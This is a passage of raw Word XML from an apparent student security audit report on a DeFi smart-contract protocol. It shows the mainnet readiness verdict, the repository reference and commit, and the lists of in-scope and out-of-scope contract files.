    </w:p>
    <w:p w14:paraId="58F06D68" w14:textId="1AA218CF" w:rsidR="004C355C" w:rsidRPr="004F09BE" w:rsidRDefault="004F09BE" w:rsidP="004F09BE">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>oconcept (PoC) tests document vulnerable behavior on historical revisions and confirm fixes on the current tree.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9DAF3B" w14:textId="363650AA" w:rsidR="00B832C7" w:rsidRDefault="00707638" w:rsidP="00B832C7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CC1623F" wp14:editId="69FAC5CB">
            <wp:extent cx="2119746" cy="3762198"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="117741390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13905" name="Рисунок 117741390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29060" cy="3778728"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74750D18" w14:textId="121B5F2D" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="00B832C7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mainnet readiness verdict:</w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Not recommended for unrestricted mainnet deployment.</w:t>
      </w:r>
      <w:r>
        <w:t> The codebase demonstrates solid engineering for a testnet capstone: reentrancy and initializer issues were caught and fixed, oracle staleness is enforced, and governance includes timelock delay and vote snapshots. Residual risks include centralized ownership during bootstrap, mock oracle fallback on testnets, limited economic stress testing, and absence of an independent third-party audit. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Arbitrum Sepolia deployment is appropriate </w:t>
        <w:lastRenderedPageBreak/>
        <w:t>for demonstration, coursework, and continued hardening</w:t>
      </w:r>
      <w:r>
        <w:t>; production mainnet would require external audit, bug bounty, monitoring, multisig administration, and mainnet Chainlink feed configuration with operational runbooks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B381188" w14:textId="77777777" w:rsidR="00B832C7" w:rsidRDefault="00B832C7" w:rsidP="00B832C7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="693E0226" w14:textId="391DDAF6" w:rsidR="00707638" w:rsidRDefault="00707638" w:rsidP="00707638">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>2. Scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B546BB" w14:textId="5C5368E1" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="00707638">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>2.1 Repository reference</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAC566A" w14:textId="01B02866" w:rsidR="00707638" w:rsidRDefault="00707638" w:rsidP="00707638">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E0A7458" wp14:editId="25FB1FBA">
            <wp:extent cx="3866515" cy="685073"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="81820424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04241" name="Рисунок 8182042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73315" cy="703996"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="138CAE6C" w14:textId="170C2154" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="00707638">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="476760EB" wp14:editId="1A897285">
            <wp:extent cx="3866606" cy="1314989"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="86146980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50367" name="Рисунок 147585036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14501" cy="1331278"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A2750E" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="00707638">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Repository: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https://github.com/alseytdastan/final_blockchain_technologies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A2750F" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="00707638">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Audit base commit: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>6c1c947154c2756fcf86fd198437c868bafd1ffb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112922EC" w14:textId="0C9D7356" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="00707638">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>2.2 In scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350CCD2F" w14:textId="5B0E35C6" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="00707638">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B31CE09" wp14:editId="5B8864A2">
            <wp:extent cx="4599160" cy="2604663"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="60384633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46331" name="Рисунок 60384633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16443" cy="2614451"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F15753" w14:textId="6D6699C1" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="00707638">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>contracts/amm/AMMPool.sol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F15754" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="00707638">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>contracts/amm/PoolFactory.sol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F15755" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="00707638">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>contracts/governance/ProtocolGovernor.sol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F15756" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="00707638">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>contracts/governance/ProtocolTimelock.sol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F15757" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="00707638">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>contracts/governance/ProtocolTreasury.sol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F15758" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="00707638">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>contracts/lending/LendingPool.sol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F15759" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="00707638">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>contracts/oracle/ChainlinkPriceFeed.sol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F1575A" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="00707638">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>contracts/oracle/PriceOracle.sol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F1575B" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="00707638">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>contracts/token/GovernanceToken.sol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F1575C" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="00707638">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>contracts/token/LPToken.sol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F1575D" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="00707638">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>contracts/token/ProtocolAccessNFT.sol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F1575E" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="00707638">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>contracts/upgradeable/UpgradeableProtocolConfig.sol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F1575F" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="00707638">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>contracts/upgradeable/UpgradeableProtocolConfigV2.sol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F15760" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="00707638">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>contracts/utils/MathUtils.sol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F15761" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="00707638">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>contracts/vault/YieldVault.sol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F15762" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="00707638">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>script/Deploy.s.sol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F15763" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="00707638">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>script/VerifyDeployment.s.sol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F15764" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="00707638">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>script/UpgradeConfig.s.sol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F15765" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="00707638">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>2.3 Out of scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9777EF" w14:textId="3C5E8EF6" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="00707638">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="129F4AA9" wp14:editId="27935DF6">
            <wp:extent cx="4598670" cy="1617428"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="85789295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92958" name="Рисунок 85789295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35136" cy="1630254"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B336D4D" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="00707638">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OpenZeppelin library internals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B336D4E" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="00707638">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Chainlink production aggregator internals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B336D4F" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="00707638">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>contracts/mocks/MockERC20.sol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B336D50" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="00707638">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>contracts/oracle/MockV3Aggregator.sol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B336D51" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="00707638">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>test/ vulnerability harnesses and test-only helper contracts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B336D52" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="00707638">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>frontend/ browser UI (except configuration and security-relevant integration notes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B336D53" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="00707638">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
